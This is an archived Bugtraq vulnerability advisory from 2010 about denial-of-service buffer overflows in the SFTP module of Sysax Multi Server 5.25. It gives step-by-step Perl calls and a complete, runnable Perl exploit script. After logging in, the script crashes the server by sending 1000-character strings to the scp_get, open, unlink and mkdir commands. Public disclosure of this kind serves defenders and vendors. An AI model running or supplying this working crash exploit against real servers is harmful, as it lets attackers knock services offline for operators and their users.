[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
From: leinakesi@xxxxxxxxx
Date: 21 Jun 2010 10:31:41 -0000

[*]Title:       Sysax Multi Server(SFTP module) "open", "unlink", "mkdir", 
"scp_get" Commands DoS Vulnerabilities
[*]Product:     Sysax Multi Server
[*]Vendor:      Codeorigin, LLC
[*]Version:     5.25 (earlier versions may also be affected)
[*]Platform:    Windows
[*]Type of Vulnerability:       Buffer overflow -->DoS
[*]Risk rating: Medium  
[*]Date of Discovery:   21-Jun-2010
[*]Discoverd by:        leinakesi (leinakesi[at]gmail[dot]com)



Overview:
1.vendor description of software
------------------------------------------------
A SSH2 and FTP server for Microsoft windows® that enables system administrators 
to support multiple protocol access to user accounts. FTPS, SFTP, and HTTPS 
based file transfers are supported in addition to FTP, Telnet, and Secure Shell 
access. Sysax Multi Server lets system administrators authenticate users using 
existing windows user accounts or by creating custom accounts, or a combination 
of both methods. A convenient web browser based administration interface makes 
it easy to monitor the status of the server remotely.It is easy to install and 
does not require advanced IT skills to manage.
2.vulnerability details:
------------------------------------------------
Several Denial of Service vulnerabilities exist in SFTP module of Sysax Multi 
Server. The unsafe commands include "open","unlink", "mkdir" and etc. .which 
can not handle overlength strings properly.

If you could log on the server successfully, take the following steps and the 
Sysax Multi server will crash which would lead to Denial of Service attack:
#initialize $FUZZ = "A" x 1000
1.      $ssh2 = Net::SSH2->new();
2.      $ssh2->connect($server, $port);
3.      $ssh2->auth_password($user, $pass);
#there are several ways to compromise the server, I list them here as 4.1, 4.2, 
and etc. ...
4.1     $scpget = $ssh2->scp_get($FUZZ);
4.2     $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);
4.3     $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);
4.4     $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);
5       $ssh2->disconnect();


Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS 
Vulnerabilities

use Net::SSH2;
use Getopt::Std;

$FUZZ = "A" x 1000;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = 
$opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
        print "usage:\n\tperl   test.pl -S [IP] -P [port] -u [user] -p 
[password]\nexample:\n";
        print "\tperl   test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
        exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please 
check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are 
correct?\n";
#any of the following commands will cause the server carsh.

$scpget = $ssh2->scp_get($FUZZ) || die "server crashed.\n";
#       $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);
#       $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);
#       $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);


print "\nover\n";

$ssh2->disconnect();
exit(0);

Prev by Date: XSS vulnerability in the search module of synType CMS
Next by Date: [ MDVSA-2010:120 ] squirrelmail
Previous by thread: XSS vulnerability in the search module of synType CMS
Next by thread: Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
Index(es):
- Date
- Thread